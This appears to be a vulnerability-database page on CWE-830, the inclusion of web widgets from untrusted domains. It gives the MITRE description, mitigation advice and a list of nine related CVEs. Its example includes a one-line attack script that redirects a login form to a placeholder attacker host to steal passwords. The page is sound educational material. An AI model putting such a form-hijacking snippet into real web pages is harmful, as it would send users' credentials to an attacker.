Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-830 (从非可信源包含Web功能例程) — Vulnerability Class 9

9 vulnerabilities classified as CWE-830 (从非可信源包含Web功能例程). AI Chinese analysis included.

CWE-830 represents a critical security weakness where an application integrates web functionality, such as widgets or scripts, from an untrusted external domain. This vulnerability typically arises when developers embed third-party code without adequate isolation, allowing the external source to execute within the application’s own security context. Attackers exploit this by compromising the untrusted source or injecting malicious code, thereby gaining unauthorized access to sensitive data, session tokens, or full control over the application’s interface and logic. To mitigate this risk, developers must enforce strict content security policies, utilize sandboxing techniques like iframes with specific attributes, and validate all external sources. Regular audits of third-party dependencies and implementing strict cross-origin resource sharing policies further ensure that external functionality remains isolated and cannot compromise the integrity of the primary application.

MITRE CWE Description
The product includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the product, potentially granting total access and control of the product to the untrusted source. Including third party functionality in a web-based environment is risky, especially if the source of the functionality is untrusted. Even if the third party is a trusted source, the product may still be exposed to attacks and malicious behavior if that trusted source is compromised, or if the code is modified in transmission from the third party to the product. This weakness is common in "mashup" development on the web, which may include source functionality from other domains. For example, Javascript-based web widgets may be inserted by using '<SCRIPT SRC="http://other.domain.here">' tags, which causes the code to run in the domain of the product, not the remote site from which the widget was loaded. As a result, the included code has access to the local DOM, including cookies and other data that the developer might not want the remote site to be able to access. Such dependencies may be desirable, or even required, but sometimes programmers are not aware that a dependency exists.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
Examples (1)
This login webpage includes a weather widget from an external website:
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>
Bad · HTML
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
Attack · JavaScript
CVE IDTitleCVSSSeverityPublished
CVE-2025-65109 Minder does not sandbox http.send in Rego programs — minder 4.3 -2025-11-21
CVE-2025-46652 IZArc 安全漏洞 — IZArc 6.1 Medium2025-04-26
CVE-2025-43703 Anki 安全漏洞 — Anki 6.1 Medium2025-04-16
CVE-2025-33027 Bandisoft Bandizip 安全漏洞 — Bandizip 6.1 Medium2025-04-15
CVE-2025-33026 PeaZip 安全漏洞 — PeaZip 6.1 Medium2025-04-15
CVE-2025-33028 WinZip 安全漏洞 — WinZip 6.1 Medium2025-04-15
CVE-2024-35180 OMERO.web JSONP callback vulnerability — omero-web 6.1 Medium2024-05-21
CVE-2023-2588 Teltonika Remote Management System 安全漏洞 — Remote Management System 8.8 High2023-05-22
CVE-2021-28162 Eclipse Theia 注入漏洞 — Eclipse Theia 6.1 -2021-03-12

Vulnerabilities classified as CWE-830 (从非可信源包含Web功能例程) represent 9 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.